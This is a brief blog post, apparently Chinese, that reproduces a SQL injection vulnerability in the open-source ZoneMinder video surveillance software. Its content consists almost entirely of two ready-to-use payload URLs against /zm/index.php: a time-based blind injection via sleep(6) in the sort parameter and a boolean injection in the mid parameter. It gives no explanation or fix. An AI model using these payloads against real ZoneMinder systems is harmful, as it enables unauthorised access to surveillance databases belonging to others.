Babing
Published on 2024-08-30 / 2 Visits
0
0

K34-1开源-ZoneMinder-SQL

K34-1开源-ZoneMinder-SQL

漏洞复现:

payload:

/zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1

/zm/index.php?limit=20&mid=-1%20OR%203*2*1=6%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request

Comment